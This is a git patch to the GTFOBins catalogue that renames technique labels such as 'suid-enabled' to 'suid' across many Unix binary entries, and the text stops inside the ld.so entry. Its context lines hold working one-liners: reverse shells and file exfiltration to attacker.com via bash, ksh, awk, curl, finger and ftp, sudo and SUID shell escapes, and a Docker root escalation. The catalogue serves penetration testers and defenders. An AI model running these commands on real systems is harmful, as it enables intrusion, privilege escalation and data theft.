From dd337b5ddfdfcde1032f9ff46ec76da04f052f67 Mon Sep 17 00:00:00 2001 From: Emilio Pinna Date: Fri, 5 Oct 2018 18:55:38 +0100 Subject: [PATCH] Adopt new function names --- _data/functions.yml | 12 ++++++------ _gtfobins/apt-get.md | 4 ++-- _gtfobins/apt.md | 4 ++-- _gtfobins/aria2c.md | 6 +++--- _gtfobins/ash.md | 6 +++--- _gtfobins/awk.md | 10 +++++----- _gtfobins/base64.md | 4 ++-- _gtfobins/bash.md | 12 ++++++------ _gtfobins/busybox.md | 8 ++++---- _gtfobins/cat.md | 4 ++-- _gtfobins/chmod.md | 4 ++-- _gtfobins/chown.md | 4 ++-- _gtfobins/cp.md | 4 ++-- _gtfobins/cpulimit.md | 4 ++-- _gtfobins/crontab.md | 4 ++-- _gtfobins/csh.md | 6 +++--- _gtfobins/curl.md | 8 ++++---- _gtfobins/cut.md | 4 ++-- _gtfobins/dash.md | 6 +++--- _gtfobins/date.md | 4 ++-- _gtfobins/dd.md | 4 ++-- _gtfobins/diff.md | 4 ++-- _gtfobins/docker.md | 4 ++-- _gtfobins/easy_install.md | 12 ++++++------ _gtfobins/ed.md | 6 +++--- _gtfobins/emacs.md | 6 +++--- _gtfobins/env.md | 6 +++--- _gtfobins/expand.md | 4 ++-- _gtfobins/expect.md | 6 +++--- _gtfobins/facter.md | 4 ++-- _gtfobins/find.md | 6 +++--- _gtfobins/finger.md | 4 ++-- _gtfobins/flock.md | 6 +++--- _gtfobins/fmt.md | 4 ++-- _gtfobins/fold.md | 4 ++-- _gtfobins/ftp.md | 8 ++++---- _gtfobins/gdb.md | 14 +++++++------- _gtfobins/git.md | 6 +++--- _gtfobins/grep.md | 4 ++-- _gtfobins/head.md | 4 ++-- _gtfobins/ionice.md | 6 +++--- _gtfobins/journalctl.md | 4 ++-- _gtfobins/jq.md | 4 ++-- _gtfobins/ksh.md | 12 ++++++------ _gtfobins/ld.so.md | 6 +++--- _gtfobins/less.md | 6 +++--- _gtfobins/ltrace.md | 4 ++-- _gtfobins/lua.md | 14 +++++++------- _gtfobins/mail.md | 4 ++-- _gtfobins/make.md | 6 +++--- _gtfobins/man.md | 6 +++--- _gtfobins/more.md | 6 +++--- _gtfobins/mount.md | 2 +- _gtfobins/mv.md | 4 ++-- _gtfobins/mysql.md | 6 +++--- _gtfobins/nano.md | 6 +++--- _gtfobins/nc.md | 12 ++++++------ _gtfobins/nice.md | 6 +++--- _gtfobins/nl.md | 4 ++-- _gtfobins/nmap.md | 14 +++++++------- _gtfobins/node.md | 12 ++++++------ _gtfobins/od.md | 4 ++-- _gtfobins/perl.md | 10 +++++----- _gtfobins/pg.md | 6 +++--- _gtfobins/php.md | 16 ++++++++-------- _gtfobins/pico.md | 6 +++--- _gtfobins/pip.md | 12 ++++++------ _gtfobins/puppet.md | 4 ++-- _gtfobins/python.md | 16 ++++++++-------- _gtfobins/rlwrap.md | 6 +++--- _gtfobins/rpm.md | 6 +++--- _gtfobins/rpmquery.md | 6 +++--- _gtfobins/rsync.md | 6 +++--- _gtfobins/ruby.md | 14 +++++++------- _gtfobins/scp.md | 10 +++++----- _gtfobins/sed.md | 8 ++++---- _gtfobins/setarch.md | 6 +++--- _gtfobins/sftp.md | 8 ++++---- _gtfobins/shuf.md | 4 ++-- _gtfobins/smbclient.md | 4 ++-- _gtfobins/socat.md | 8 ++++---- _gtfobins/sort.md | 4 ++-- _gtfobins/sqlite3.md | 6 +++--- _gtfobins/ssh.md | 8 ++++---- _gtfobins/stdbuf.md | 6 +++--- _gtfobins/strace.md | 6 +++--- _gtfobins/tail.md | 4 ++-- _gtfobins/tar.md | 8 ++++---- _gtfobins/taskset.md | 6 +++--- _gtfobins/tclsh.md | 8 ++++---- _gtfobins/tcpdump.md | 4 ++-- _gtfobins/tee.md | 4 ++-- _gtfobins/telnet.md | 8 ++++---- _gtfobins/tftp.md | 8 ++++---- _gtfobins/time.md | 6 +++--- _gtfobins/timeout.md | 6 +++--- _gtfobins/ul.md | 4 ++-- _gtfobins/unexpand.md | 4 ++-- _gtfobins/uniq.md | 4 ++-- _gtfobins/unshare.md | 6 +++--- _gtfobins/vi.md | 6 +++--- _gtfobins/vim.md | 6 +++--- _gtfobins/watch.md | 8 ++++---- _gtfobins/wget.md | 8 ++++---- _gtfobins/whois.md | 4 ++-- _gtfobins/wish.md | 6 +++--- _gtfobins/xargs.md | 6 +++--- _gtfobins/xxd.md | 4 ++-- _gtfobins/zip.md | 6 +++--- _gtfobins/zsh.md | 6 +++--- 110 files changed, 354 insertions(+), 354 deletions(-) diff --git a/_data/functions.yml b/_data/functions.yml index 444bab9..e38449e 100644 --- a/_data/functions.yml +++ b/_data/functions.yml @@ -4,13 +4,13 @@ shell: label: Shell description: | - It can be used to break out from restricted environments by spawning an + It can be used to break out from restricted environments by spawning an interactive system shell. command: label: Command description: | - It can be used to break out from restricted environments by running + It can be used to break out from restricted environments by running non-interactive system commands. reverse-shell: @@ -19,8 +19,8 @@ reverse-shell: It can send back a reverse shell to a listening attacker to open a remote network access. -reverse-non-interactive-shell: - label: Reverse non-interactive shell +non-interactive-reverse-shell: + label: Non-interactive reverse shell description: | It can send back a non-interactive reverse shell to a listening attacker to open a remote network access. @@ -30,8 +30,8 @@ bind-shell: description: | It can bind a shell to a local port to allow remote network access. -bind-non-interactive-shell: - label: Bind non-interactive shell +non-interactive-bind-shell: + label: Non-interactive bind shell description: | It can bind a non-interactive shell to a local port to allow remote network access. diff --git a/_gtfobins/apt-get.md b/_gtfobins/apt-get.md index 096e0c3..c4b035d 100644 --- a/_gtfobins/apt-get.md +++ b/_gtfobins/apt-get.md @@ -1,11 +1,11 @@ --- description: This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply. functions: - execute-interactive: + shell: - code: | apt-get changelog apt !/bin/sh - sudo-enabled: + sudo: - code: | sudo apt-get changelog apt !/bin/sh diff --git a/_gtfobins/apt.md b/_gtfobins/apt.md index 096e0c3..c4b035d 100644 --- a/_gtfobins/apt.md +++ b/_gtfobins/apt.md @@ -1,11 +1,11 @@ --- description: This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply. functions: - execute-interactive: + shell: - code: | apt-get changelog apt !/bin/sh - sudo-enabled: + sudo: - code: | sudo apt-get changelog apt !/bin/sh diff --git a/_gtfobins/aria2c.md b/_gtfobins/aria2c.md index eeda286..d9fc451 100644 --- a/_gtfobins/aria2c.md +++ b/_gtfobins/aria2c.md @@ -1,7 +1,7 @@ --- description: Note that the subprocess is immediately sent to the background. functions: - execute-non-interactive: + command: - code: | COMMAND='id' TF=$(mktemp) @@ -10,14 +10,14 @@ functions: aria2c --on-download-error=$TF http://x - description: The remote file `aaaaaaaaaaaaaaaa` (must be a string of 16 hex digit) contains the shell script. Note that said file needs to be written on disk in order to be executed. `--allow-overwrite` is needed if this is executed multiple times with the same GID. code: aria2c --allow-overwrite --gid=aaaaaaaaaaaaaaaa --on-download-complete=bash http://attacker.com/aaaaaaaaaaaaaaaa - suid-enabled: + suid: - code: | COMMAND='id' TF=$(mktemp) echo "$COMMAND" > $TF chmod +x $TF ./aria2c --on-download-error=$TF http://x - sudo-enabled: + sudo: - code: | COMMAND='id' TF=$(mktemp) diff --git a/_gtfobins/ash.md b/_gtfobins/ash.md index aee72f4..287745a 100644 --- a/_gtfobins/ash.md +++ b/_gtfobins/ash.md @@ -1,13 +1,13 @@ --- functions: - execute-interactive: + shell: - code: ash file-write: - code: | export LFILE=file_to_write ash -c 'echo DATA > $LFILE' - suid-enabled: + suid: - code: "./ash" - sudo-enabled: + sudo: - code: sudo ash --- diff --git a/_gtfobins/awk.md b/_gtfobins/awk.md index 08816ab..a131e09 100644 --- a/_gtfobins/awk.md +++ b/_gtfobins/awk.md @@ -1,8 +1,8 @@ --- functions: - execute-interactive: + shell: - code: awk 'BEGIN {system("/bin/sh")}' - reverse-shell-non-interactive: + non-interactive-reverse-shell: - description: Run `nc -l -p 12345` on the attacker box to receive the shell. code: | RHOST=attacker.com @@ -11,7 +11,7 @@ functions: s = "/inet/tcp/0/" RHOST "/" RPORT; while (1) {printf "> " |& s; if ((s |& getline c) <= 0) break; while (c && (c |& getline) > 0) print $0 |& s; close(c)}}' - bind-shell-non-interactive: + non-interactive-bind-shell: - description: Run `nc target.com 12345` on the attacker box to connect to the shell. code: | LPORT=12345 @@ -27,8 +27,8 @@ functions: - code: | LFILE=file_to_read awk '//' "$LFILE" - sudo-enabled: + sudo: - code: sudo awk 'BEGIN {system("/bin/sh")}' - suid-limited: + limited-suid: - code: ./awk 'BEGIN {system("/bin/sh")}' --- diff --git a/_gtfobins/base64.md b/_gtfobins/base64.md index 0148a42..de9f950 100644 --- a/_gtfobins/base64.md +++ b/_gtfobins/base64.md @@ -4,11 +4,11 @@ functions: - code: | LFILE=file_to_read base64 "$LFILE" | base64 --decode - suid-enabled: + suid: - code: | LFILE=file_to_read ./base64 "$LFILE" | base64 --decode - sudo-enabled: + sudo: - code: | LFILE=file_to_read sudo base64 "$LFILE" | base64 --decode diff --git a/_gtfobins/bash.md b/_gtfobins/bash.md index bff48d9..92a69b2 100644 --- a/_gtfobins/bash.md +++ b/_gtfobins/bash.md @@ -1,14 +1,14 @@ --- functions: - execute-interactive: + shell: - code: bash - reverse-shell-interactive: + reverse-shell: - description: Run `nc -l -p 12345` on the attacker box to receive the shell. code: | export RHOST=attacker.com export RPORT=12345 bash -c 'bash -i >& /dev/tcp/$RHOST/$RPORT 0>&1' - upload: + file-upload: - description: Send local file in the body of an HTTP POST request. Run an HTTP service on the attacker box to collect the file. code: | export RHOST=attacker.com @@ -21,7 +21,7 @@ functions: export RPORT=12345 export LFILE=file_to_send bash -c 'cat $LFILE > /dev/tcp/$RHOST/$RPORT' - download: + file-download: - description: Fetch a remote file via HTTP GET request. code: | export RHOST=attacker.com @@ -58,8 +58,8 @@ functions: HISTTIMEFORMAT=$'\r\e[K' history -r $LFILE history - suid-enabled: + suid: - code: "./bash -p" - sudo-enabled: + sudo: - code: sudo bash --- diff --git a/_gtfobins/busybox.md b/_gtfobins/busybox.md index c6aab47..9e01c7a 100644 --- a/_gtfobins/busybox.md +++ b/_gtfobins/busybox.md @@ -1,9 +1,9 @@ --- description: BusyBox may contain many UNIX utilities, run `busybox --list-full` to check what GTFBins binaries are supported. Here some example. functions: - execute-interactive: + shell: - code: busybox sh - upload: + file-upload: - description: Serve files in the local folder running an HTTP server. code: | export LPORT=12345 @@ -16,9 +16,9 @@ functions: - code: | LFILE=file_to_read ./busybox cat "$LFILE" - suid-enabled: + suid: - description: It may drop the SUID privileges depending on the compilation flags and the runtime configuration. code: "./busybox sh" - sudo-enabled: + sudo: - code: sudo busybox sh --- diff --git a/_gtfobins/cat.md b/_gtfobins/cat.md index 3781ffa..dfd6563 100644 --- a/_gtfobins/cat.md +++ b/_gtfobins/cat.md @@ -4,11 +4,11 @@ functions: - code: | LFILE=file_to_read cat "$LFILE" - suid-enabled: + suid: - code: | LFILE=file_to_read ./cat "$LFILE" - sudo-enabled: + sudo: - code: | LFILE=file_to_read sudo cat "$LFILE" diff --git a/_gtfobins/chmod.md b/_gtfobins/chmod.md index f61b194..61e3361 100644 --- a/_gtfobins/chmod.md +++ b/_gtfobins/chmod.md @@ -1,11 +1,11 @@ --- description: This can be run with elevated privileges to change permissions and then read, write, or execute a file. functions: - suid-enabled: + suid: - code: | LFILE=file_to_change ./chmod 0777 $LFILE - sudo-enabled: + sudo: - code: | LFILE=file_to_change sudo chmod 0777 $LFILE diff --git a/_gtfobins/chown.md b/_gtfobins/chown.md index 0414645..3e2eab4 100644 --- a/_gtfobins/chown.md +++ b/_gtfobins/chown.md @@ -1,11 +1,11 @@ --- description: This can be run with elevated privileges to change ownership and then read, write, or execute a file. functions: - suid-enabled: + suid: - code: | LFILE=file_to_change ./chown $(id -un):$(id -gn) $LFILE - sudo-enabled: + sudo: - code: | LFILE=file_to_change sudo chown $(id -un):$(id -gn) $LFILE diff --git a/_gtfobins/cp.md b/_gtfobins/cp.md index ba101cf..f1dfb2e 100644 --- a/_gtfobins/cp.md +++ b/_gtfobins/cp.md @@ -1,13 +1,13 @@ --- description: This can be used to copy and then read or write files from a restricted file systems or with elevated privileges. functions: - suid-enabled: + suid: - code: | LFILE=file_to_write TF=$(mktemp) echo "DATA" > $TF ./cp $TF $LFILE - sudo-enabled: + sudo: - code: | LFILE=file_to_write TF=$(mktemp) diff --git a/_gtfobins/cpulimit.md b/_gtfobins/cpulimit.md index 9ad7a95..2bf19b6 100644 --- a/_gtfobins/cpulimit.md +++ b/_gtfobins/cpulimit.md @@ -1,7 +1,7 @@ --- functions: - execute-interactive: + shell: - code: cpulimit -l 100 -f /bin/sh - sudo-enabled: + sudo: - code: sudo cpulimit -l 100 -f /bin/sh --- diff --git a/_gtfobins/crontab.md b/_gtfobins/crontab.md index 6ec198c..2f1439a 100644 --- a/_gtfobins/crontab.md +++ b/_gtfobins/crontab.md @@ -1,9 +1,9 @@ --- functions: - execute-non-interactive: + command: - description: The commands are executed according to the crontab file edited via the `crontab` utility. code: crontab -e - sudo-enabled: + sudo: - description: The commands are executed according to the crontab file edited via the `crontab` utility. code: sudo crontab -e --- diff --git a/_gtfobins/csh.md b/_gtfobins/csh.md index 3c161bf..908d053 100644 --- a/_gtfobins/csh.md +++ b/_gtfobins/csh.md @@ -1,13 +1,13 @@ --- functions: - execute-interactive: + shell: - code: csh file-write: - code: | export LFILE=file_to_write ash -c 'echo DATA > $LFILE' - suid-enabled: + suid: - code: "./csh -b" - sudo-enabled: + sudo: - code: sudo csh --- diff --git a/_gtfobins/curl.md b/_gtfobins/curl.md index 8d3dacc..3c7db92 100644 --- a/_gtfobins/curl.md +++ b/_gtfobins/curl.md @@ -1,12 +1,12 @@ --- functions: - upload: + file-upload: - description: Send local file with an HTTP POST request. Run an HTTP service on the attacker box to collect the file. Note that the file will be sent as-is, instruct the service to not URL-decode the body. Omit the `@` to send hard-coded data. code: | URL=http://attacker.com/ LFILE=file_to_send curl -X POST -d @$file_to_send $URL - download: + file-download: - description: Fetch a remote file via HTTP GET request. code: | URL=http://attacker.com/file_to_get @@ -17,13 +17,13 @@ functions: code: | LFILE=/tmp/file_to_read curl file://$LFILE - suid-enabled: + suid: - description: Fetch a remote file via HTTP GET request. code: | URL=http://attacker.com/file_to_get LFILE=file_to_save ./curl $URL -o $LFILE - sudo-enabled: + sudo: - description: Fetch a remote file via HTTP GET request. code: | URL=http://attacker.com/file_to_get diff --git a/_gtfobins/cut.md b/_gtfobins/cut.md index c9afd76..d677d15 100644 --- a/_gtfobins/cut.md +++ b/_gtfobins/cut.md @@ -4,11 +4,11 @@ functions: - code: | LFILE=file_to_read cut -d "" -f1 "$LFILE" - suid-enabled: + suid: - code: | LFILE=file_to_read ./cut -d "" -f1 "$LFILE" - sudo-enabled: + sudo: - code: | LFILE=file_to_read sudo cut -d "" -f1 "$LFILE" diff --git a/_gtfobins/dash.md b/_gtfobins/dash.md index 42facb4..d6bf7c9 100644 --- a/_gtfobins/dash.md +++ b/_gtfobins/dash.md @@ -1,13 +1,13 @@ --- functions: - execute-interactive: + shell: - code: dash file-write: - code: | export LFILE=file_to_write ash -c 'echo DATA > $LFILE' - suid-enabled: + suid: - code: ./dash -p - sudo-enabled: + sudo: - code: sudo dash --- diff --git a/_gtfobins/date.md b/_gtfobins/date.md index 312ce07..a5604c2 100644 --- a/_gtfobins/date.md +++ b/_gtfobins/date.md @@ -8,11 +8,11 @@ functions: - code: | LFILE=file_to_read date -f $LFILE - suid-enabled: + suid: - code: | LFILE=file_to_read ./date -f $LFILE - sudo-enabled: + sudo: - code: | LFILE=file_to_read sudo date -f $LFILE diff --git a/_gtfobins/dd.md b/_gtfobins/dd.md index 79dfa97..fc02176 100644 --- a/_gtfobins/dd.md +++ b/_gtfobins/dd.md @@ -8,11 +8,11 @@ functions: - code: | LFILE=file_to_read dd if=LFILE - suid-enabled: + suid: - code: | LFILE=file_to_write echo "data" | ./dd of=$LFILE - sudo-enabled: + sudo: - code: | LFILE=file_to_write echo "data" | sudo -E dd of=$LFILE diff --git a/_gtfobins/diff.md b/_gtfobins/diff.md index 6e24b86..ab33d2f 100644 --- a/_gtfobins/diff.md +++ b/_gtfobins/diff.md @@ -4,11 +4,11 @@ functions: - code: | LFILE=file_to_read diff --line-format=%L /dev/null $LFILE - suid-enabled: + suid: - code: | LFILE=file_to_read ./diff --line-format=%L /dev/null $LFILE - sudo-enabled: + sudo: - code: | LFILE=file_to_read sudo diff --line-format=%L /dev/null $LFILE diff --git a/_gtfobins/docker.md b/_gtfobins/docker.md index eae6a36..448c422 100644 --- a/_gtfobins/docker.md +++ b/_gtfobins/docker.md @@ -2,11 +2,11 @@ description: | Exploit the fact that Docker runs as root to create a SUID binary on the host using a container. This requires the user to be privileged enough to run docker, e.g. being in the `docker` group. Any other Docker Linux image should work, e.g., `debian`. functions: - sudo-enabled: + sudo: - code: | sudo docker run --rm -v /home/$USER:/h_docs ubuntu \ sh -c 'cp /bin/sh /h_docs/ && chmod +s /h_docs/sh' && ~/sh -p - suid-enabled: + suid: - code: | ./docker run --rm -v /home/$USER:/h_docs ubuntu \ sh -c 'cp /bin/sh /h_docs/ && chmod +s /h_docs/sh' && ~/sh -p diff --git a/_gtfobins/easy_install.md b/_gtfobins/easy_install.md index db43b38..c144e66 100644 --- a/_gtfobins/easy_install.md +++ b/_gtfobins/easy_install.md @@ -1,11 +1,11 @@ --- functions: - execute-interactive: + shell: - code: | TF=$(mktemp -d) echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > $TF/setup.py easy_install $TF - reverse-shell-interactive: + reverse-shell: - description: Run ``socat file:`tty`,raw,echo=0 tcp-listen:12345`` on the attacker box to receive the shell. code: | export RHOST=attacker.com @@ -16,7 +16,7 @@ functions: [os.dup2(s.fileno(),fd) for fd in (0,1,2)] pty.spawn("/bin/sh")' > $TF/setup.py easy_install $TF - upload: + file-upload: - description: Send local file via "d" parameter of a HTTP POST request. Run an HTTP service on the attacker box to collect the file. code: | export URL=http://attacker.com/ @@ -36,7 +36,7 @@ functions: else: import SimpleHTTPServer as s, SocketServer as ss ss.TCPServer(("", int(e["LPORT"])), s.SimpleHTTPRequestHandler).serve_forever()' > $TF/setup.py easy_install $TF - download: + file-download: - description: Fetch a remote file via HTTP GET request. The file path must be absolute. code: | export URL=http://attacker.com/file_to_get @@ -62,12 +62,12 @@ functions: TF=$(mktemp -d) echo 'print(open("file_to_read").read())' > $TF/setup.py easy_install $TF - load-library: + library-load: - code: | TF=$(mktemp -d) echo 'from ctypes import cdll; cdll.LoadLibrary("lib.so")' > $TF/setup.py easy_install $TF - sudo-enabled: + sudo: - code: | TF=$(mktemp -d) echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > $TF/setup.py diff --git a/_gtfobins/ed.md b/_gtfobins/ed.md index 8ef61c9..29735e9 100644 --- a/_gtfobins/ed.md +++ b/_gtfobins/ed.md @@ -1,6 +1,6 @@ --- functions: - execute-interactive: + shell: - code: | ed !/bin/sh @@ -17,11 +17,11 @@ functions: ed file_to_read ,p q - sudo-enabled: + sudo: - code: | sudo ed !/bin/sh - suid-limited: + limited-suid: - code: | ./ed !/bin/sh diff --git a/_gtfobins/emacs.md b/_gtfobins/emacs.md index d04ba61..2ff2d03 100644 --- a/_gtfobins/emacs.md +++ b/_gtfobins/emacs.md @@ -1,6 +1,6 @@ --- functions: - execute-interactive: + shell: - code: emacs -Q -nw --eval '(term "/bin/sh")' file-write: - code: | @@ -9,8 +9,8 @@ functions: C-x C-s file-read: - code: emacs file_to_read - suid-enabled: + suid: - code: ./emacs -Q -nw --eval '(term "/bin/sh -p")' - sudo-enabled: + sudo: - code: sudo emacs -Q -nw --eval '(term "/bin/sh")' --- diff --git a/_gtfobins/env.md b/_gtfobins/env.md index 0dc5e64..e5d16dd 100644 --- a/_gtfobins/env.md +++ b/_gtfobins/env.md @@ -1,9 +1,9 @@ --- functions: - execute-interactive: + shell: - code: env /bin/sh - suid-enabled: + suid: - code: ./env /bin/sh -p - sudo-enabled: + sudo: - code: sudo env /bin/sh --- diff --git a/_gtfobins/expand.md b/_gtfobins/expand.md index 3c00ddf..74a87ea 100644 --- a/_gtfobins/expand.md +++ b/_gtfobins/expand.md @@ -5,11 +5,11 @@ functions: - code: | LFILE=file_to_read expand "$LFILE" - suid-enabled: + suid: - code: | LFILE=file_to_read ./expand "$LFILE" - sudo-enabled: + sudo: - code: | LFILE=file_to_read sudo expand "$LFILE" diff --git a/_gtfobins/expect.md b/_gtfobins/expect.md index 541aa47..ddbb7e7 100644 --- a/_gtfobins/expect.md +++ b/_gtfobins/expect.md @@ -1,9 +1,9 @@ --- functions: - execute-interactive: + shell: - code: expect -c 'spawn /bin/sh;interact' - suid-enabled: + suid: - code: ./expect -c 'spawn /bin/sh -p;interact' - sudo-enabled: + sudo: - code: sudo expect -c 'spawn /bin/sh;interact' --- diff --git a/_gtfobins/facter.md b/_gtfobins/facter.md index bce0db0..2dab660 100644 --- a/_gtfobins/facter.md +++ b/_gtfobins/facter.md @@ -1,11 +1,11 @@ --- functions: - execute-interactive: + shell: - code: | TF=$(mktemp -d) echo 'exec("/bin/sh")' > $TF/x.rb FACTERLIB=$TF facter - sudo-enabled: + sudo: - code: | TF=$(mktemp -d) echo 'exec("/bin/sh")' > $TF/x.rb diff --git a/_gtfobins/find.md b/_gtfobins/find.md index bb85e04..350f12a 100644 --- a/_gtfobins/find.md +++ b/_gtfobins/find.md @@ -1,9 +1,9 @@ --- functions: - execute-interactive: + shell: - code: find . -exec /bin/sh \; -quit - suid-enabled: + suid: - code: ./find . -exec /bin/sh -p \; -quit - sudo-enabled: + sudo: - code: sudo find . -exec /bin/sh \; -quit --- diff --git a/_gtfobins/finger.md b/_gtfobins/finger.md index 10079df..c3fa743 100644 --- a/_gtfobins/finger.md +++ b/_gtfobins/finger.md @@ -2,13 +2,13 @@ description: | `finger` hangs waiting for the remote peer to close the socket. functions: - upload: + file-upload: - description: Send a binary file to a TCP port. Run `sudo nc -l -p 79 | base64 -d > "file_to_save"` on the attacker box to collect the file. The file length is limited by the maximum size of arguments. code: | RHOST=attacker.com LFILE=file_to_send finger "$(base64 $LFILE)@$RHOST" - download: + file-download: - description: Fetch remote binary file from a remote TCP port. Run `base64 "file_to_send" | sudo nc -l -p 79` on the attacker box to send the file. code: | RHOST=attacker.com diff --git a/_gtfobins/flock.md b/_gtfobins/flock.md index 22c0937..1909cd0 100644 --- a/_gtfobins/flock.md +++ b/_gtfobins/flock.md @@ -1,9 +1,9 @@ --- functions: - execute-interactive: + shell: - code: flock -u / /bin/sh - suid-enabled: + suid: - code: ./flock -u / /bin/sh -p - sudo-enabled: + sudo: - code: sudo flock -u / /bin/sh --- diff --git a/_gtfobins/fmt.md b/_gtfobins/fmt.md index 88f783d..3061c48 100644 --- a/_gtfobins/fmt.md +++ b/_gtfobins/fmt.md @@ -5,11 +5,11 @@ functions: - code: | LFILE=file_to_read fmt -pNON_EXISTING_PREFIX "$LFILE" - suid-enabled: + suid: - code: | LFILE=file_to_read ./fmt -pNON_EXISTING_PREFIX "$LFILE" - sudo-enabled: + sudo: - code: | LFILE=file_to_read sudo fmt -pNON_EXISTING_PREFIX "$LFILE" diff --git a/_gtfobins/fold.md b/_gtfobins/fold.md index e05e3e4..fc53f3a 100644 --- a/_gtfobins/fold.md +++ b/_gtfobins/fold.md @@ -4,11 +4,11 @@ functions: - code: | LFILE=file_to_read fold -w99999999 "$LFILE" - suid-enabled: + suid: - code: | LFILE=file_to_read ./fold -w99999999 "$LFILE" - sudo-enabled: + sudo: - code: | LFILE=file_to_read sudo fold -w99999999 "$LFILE" diff --git a/_gtfobins/ftp.md b/_gtfobins/ftp.md index 3a522dc..5d177a6 100644 --- a/_gtfobins/ftp.md +++ b/_gtfobins/ftp.md @@ -1,22 +1,22 @@ --- functions: - execute-interactive: + shell: - code: | ftp !/bin/sh - upload: + file-upload: - description: Send local file to a FTP server. code: | RHOST=attacker.com ftp $RHOST put file_to_send - download: + file-download: - description: Fetch a remote file from a FTP server. code: | RHOST=attacker.com ftp $RHOST get file_to_get - sudo-enabled: + sudo: - code: | sudo ftp !/bin/sh diff --git a/_gtfobins/gdb.md b/_gtfobins/gdb.md index c5dfc4e..68676d3 100644 --- a/_gtfobins/gdb.md +++ b/_gtfobins/gdb.md @@ -1,8 +1,8 @@ --- functions: - execute-interactive: + shell: - code: gdb -nx -ex '!sh' -ex quit - reverse-shell-interactive: + reverse-shell: - description: This requires that GDB is compiled with Python support. Run ``socat file:`tty`,raw,echo=0 tcp-listen:12345`` on the attacker box to receive the shell. code: | export RHOST=attacker.com @@ -11,7 +11,7 @@ functions: s.connect((os.getenv("RHOST"),int(os.getenv("RPORT")))) [os.dup2(s.fileno(),fd) for fd in (0,1,2)] pty.spawn("/bin/sh")' -ex quit - upload: + file-upload: - description: This requires that GDB is compiled with Python support. Send local file via "d" parameter of a HTTP POST request. Run an HTTP service on the attacker box to collect the file. code: | export URL=http://attacker.com/ @@ -27,7 +27,7 @@ functions: if sys.version_info.major == 3: import http.server as s, socketserver as ss else: import SimpleHTTPServer as s, SocketServer as ss ss.TCPServer(("", int(e["LPORT"])), s.SimpleHTTPRequestHandler).serve_forever()' -ex quit - download: + file-download: - description: This requires that GDB is compiled with Python support. Fetch a remote file via HTTP GET request. code: | export URL=http://attacker.com/file_to_get @@ -44,12 +44,12 @@ functions: file-read: - description: This requires that GDB is compiled with Python support. code: gdb -nx -ex 'python print(open("file_to_read").read())' -ex quit - load-library: + library-load: - description: This requires that GDB is compiled with Python support. code: gdb -nx -ex 'python from ctypes import cdll; cdll.LoadLibrary("lib.so")' -ex quit - sudo-enabled: + sudo: - code: sudo gdb -nx -ex '!sh' -ex quit - capabilities-enabled: + capabilities: - description: This requires that GDB is compiled with Python support. code: ./gdb -nx -ex 'python import os; os.setuid(0)' -ex '!sh' -ex quit --- diff --git a/_gtfobins/git.md b/_gtfobins/git.md index b6b82ad..e9769ac 100644 --- a/_gtfobins/git.md +++ b/_gtfobins/git.md @@ -1,9 +1,9 @@ --- functions: - execute-interactive: + shell: - code: PAGER='sh -c "exec sh 0<&1"' git -p help - sudo-enabled: + sudo: - code: PAGER='sh -c "exec sh 0<&1"' sudo -E git -p help - suid-limited: + limited-suid: - code: PAGER='sh -c "exec sh 0<&1"' ./git -p help --- diff --git a/_gtfobins/grep.md b/_gtfobins/grep.md index 468c404..4a274c9 100644 --- a/_gtfobins/grep.md +++ b/_gtfobins/grep.md @@ -6,11 +6,11 @@ functions: - code: | LFILE=file_to_read grep '' $LFILE - suid-enabled: + suid: - code: | LFILE=file_to_read ./grep '' $LFILE - sudo-enabled: + sudo: - code: | LFILE=file_to_read sudo grep '' $LFILE diff --git a/_gtfobins/head.md b/_gtfobins/head.md index 68f282f..d709e4c 100644 --- a/_gtfobins/head.md +++ b/_gtfobins/head.md @@ -4,11 +4,11 @@ functions: - code: | LFILE=file_to_read head -c1G "$LFILE" - suid-enabled: + suid: - code: | LFILE=file_to_read ./head -c1G "$LFILE" - sudo-enabled: + sudo: - code: | LFILE=file_to_read sudo head -c1G "$LFILE" diff --git a/_gtfobins/ionice.md b/_gtfobins/ionice.md index 9597bea..eed0bae 100644 --- a/_gtfobins/ionice.md +++ b/_gtfobins/ionice.md @@ -1,9 +1,9 @@ --- functions: - execute-interactive: + shell: - code: ionice /bin/sh - suid-enabled: + suid: - code: ./ionice /bin/sh -p - sudo-enabled: + sudo: - code: sudo ionice /bin/sh --- diff --git a/_gtfobins/journalctl.md b/_gtfobins/journalctl.md index 53d531a..476417f 100644 --- a/_gtfobins/journalctl.md +++ b/_gtfobins/journalctl.md @@ -4,11 +4,11 @@ description: | This might not work if run by unprivileged users depending on the system configuration. functions: - execute-interactive: + shell: - code: | journalctl !/bin/sh - sudo-enabled: + sudo: - code: | sudo journalctl !/bin/sh diff --git a/_gtfobins/jq.md b/_gtfobins/jq.md index 87989ad..bf23af6 100644 --- a/_gtfobins/jq.md +++ b/_gtfobins/jq.md @@ -4,11 +4,11 @@ functions: - code: | LFILE=file_to_read jq -Rr . "$LFILE" - suid-enabled: + suid: - code: | LFILE=file_to_read ./jq -Rr . "$LFILE" - sudo-enabled: + sudo: - code: | LFILE=file_to_read sudo jq -Rr . "$LFILE" diff --git a/_gtfobins/ksh.md b/_gtfobins/ksh.md index a16514e..2708705 100644 --- a/_gtfobins/ksh.md +++ b/_gtfobins/ksh.md @@ -1,14 +1,14 @@ --- functions: - execute-interactive: + shell: - code: ksh - reverse-shell-interactive: + reverse-shell: - description: Run `nc -l -p 12345` on the attacker box to receive the shell. code: | export RHOST=attacker.com export RPORT=12345 ksh -c 'ksh -i > /dev/tcp/$RHOST/$RPORT 2>&1 0>&1' - upload: + file-upload: - description: Send local file in the body of an HTTP POST request. Run an HTTP service on the attacker box to collect the file. code: | export RHOST=attacker.com @@ -21,7 +21,7 @@ functions: export RPORT=12345 export LFILE=file_to_send ksh -c 'cat $LFILE > /dev/tcp/$RHOST/$RPORT' - download: + file-download: - description: Fetch a remote file via HTTP GET request. code: | export RHOST=attacker.com @@ -49,8 +49,8 @@ functions: code: | export LFILE=file_to_read ksh -c $'read -r -d \x04 < "$LFILE"; echo "$REPLY"' - suid-enabled: + suid: - code: ./ksh -p - sudo-enabled: + sudo: - code: sudo ksh --- diff --git a/_gtfobins/ld.so.md b/_gtfobins/ld.so.md index b57e5b9..c251e78 100644 --- a/_gtfobins/ld.so.md +++ b/_gtfobins/ld.so.md @@ -7,10 +7,10 @@ description: | 